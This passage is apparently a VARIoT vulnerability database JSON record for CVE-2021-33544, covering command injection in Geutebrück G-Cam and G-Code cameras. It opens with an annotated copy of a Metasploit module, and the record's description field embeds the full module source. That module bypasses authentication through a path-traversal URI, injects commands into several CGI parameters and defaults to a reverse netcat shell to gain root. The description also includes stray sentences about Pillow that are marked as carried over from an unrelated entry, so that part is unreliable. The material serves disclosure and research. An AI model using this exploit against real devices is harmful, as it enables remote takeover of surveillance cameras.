      # Builds the request described by the selected target and sends it once.
      # The response is not inspected; the final status message is printed
      # whatever the device answered.
      def exploit
        print_status("#{rhost}:#{rport} - Setting up request...")

        # Every target defined in this module uses GET, so 'vars_get' is the
        # key chosen here; the else branch covers any other method value.
        method = target['http_method']
        if method == 'GET'
          http_method_vars = 'vars_get'
        else
          http_method_vars = 'vars_post'
        end

        # Replace the PLACEHOLDER_CMD marker inside each parameter value with
        # the encoded payload; values without the marker are left as they are.
        http_vars = target['http_vars']
        http_vars.each do |(k, v)|
          if v.include? 'PLACEHOLDER_CMD'
            http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
          end
        end

        print_status("Sending CMD injection request to #{rhost}:#{rport}")
        send_request_cgi(
          {
            'method' => method,
            'uri' => target['uri'],
            http_method_vars => http_vars
          }
        )
        print_status('Exploit complete, you should get a shell as the root user!')
      end
    end


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0597",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33544"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33544",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33544",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33544",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33544",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33544",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2093",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33544"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33544"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. The G-Cam E2 and G-Code products provided by GEUTEBRUCK contain the following multiple vulnerabilities. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549. The expected impact depends on each vulnerability, but may be as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * A remote third party triggers a buffer overflow in the counter parameter and executes arbitrary code - CVE-2021-33545 \u2025 * A remote third party triggers a buffer overflow in the name parameter and executes arbitrary code - CVE-2021-33546 \u2025 * A remote third party triggers a buffer overflow in the profile parameter and executes arbitrary code - CVE-2021-33547 \u2025 * A remote third party triggers a buffer overflow in the action parameter and executes arbitrary code - CVE-2021-33549. Pillow is a Python-based image processing library (this sentence and the next appear to be carried over from an unrelated CNNVD entry and do not describe the Geutebr\u00fcck devices). \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. 
##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n          and exploits multiple authenticated arbitrary command execution vulnerabilities within\n          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n          remote code execution as the root user. 
\n        },\n\n        \u0027Author\u0027 =\u003e [\n          \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n          \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n          \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n        ],\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272021-33543\u0027],\n          [\u0027CVE\u0027, \u00272021-33544\u0027],\n          [\u0027CVE\u0027, \u00272021-33548\u0027],\n          [\u0027CVE\u0027, \u00272021-33550\u0027],\n          [\u0027CVE\u0027, \u00272021-33551\u0027],\n          [\u0027CVE\u0027, \u00272021-33552\u0027],\n          [\u0027CVE\u0027, \u00272021-33553\u0027],\n          [\u0027CVE\u0027, \u00272021-33554\u0027],\n          [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n          [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n          [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n                \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n                \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n                \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n               
 \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33548 - factory.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33550 - language.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33551 - oem.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027set\u0027,\n                \u0027enable\u0027 =\u003e \u0027yes\u0027,\n                \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027get\u0027,\n                \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                
\u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n          \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n          \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n        }\n      )\n    )\n  end\n\n  def firmware\n    res = send_request_cgi(\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n    )\n    unless res\n      print_error(\u0027Connection failed!\u0027)\n      return false\n    end\n\n    unless res\u0026.body \u0026\u0026 !res.body.empty?\n      print_error(\u0027Empty body in the response!\u0027)\n      return false\n    end\n\n    res_xml = res.get_xml_document\n    if res_xml.at(\u0027//firmware\u0027).nil?\n      print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n      return false\n   
 end\n    raw_text = res_xml.at(\u0027//firmware\u0027).text\n    if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n      raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n    else\n      print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n      false\n    end\n  end\n\n  def check\n    version = firmware\n    if version == false\n      return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n    end\n\n    rex_version = Rex::Version.new(version)\n    vprint_status(\"Found Geutebruck version #{rex_version}\")\n    if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n      return CheckCode::Appears\n    end\n\n    CheckCode::Safe\n  end\n\n  def exploit\n    print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n    method = target[\u0027http_method\u0027]\n    if method == \u0027GET\u0027\n      http_method_vars = \u0027vars_get\u0027\n    else\n      http_method_vars = \u0027vars_post\u0027\n    end\n\n    http_vars = target[\u0027http_vars\u0027]\n    http_vars.each do |(k, v)|\n      if v.include? \u0027PLACEHOLDER_CMD\u0027\n        http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n      end\n    end\n\n    print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n    send_request_cgi(\n      {\n        \u0027method\u0027 =\u003e method,\n        \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n        http_method_vars =\u003e http_vars\n      }\n    )\n    print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33544"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33544"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33544",
            "trust": 2.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "164036",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2021090031",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2093",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33544",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33544"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33544"
          }
        ]
      },
      "id": "VAR-202109-0597",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T21:21:41.117000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK\u2019s web portal (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Geutebr\u00fcck G-Cam E2  and  G-Code Fixes for command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158073"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
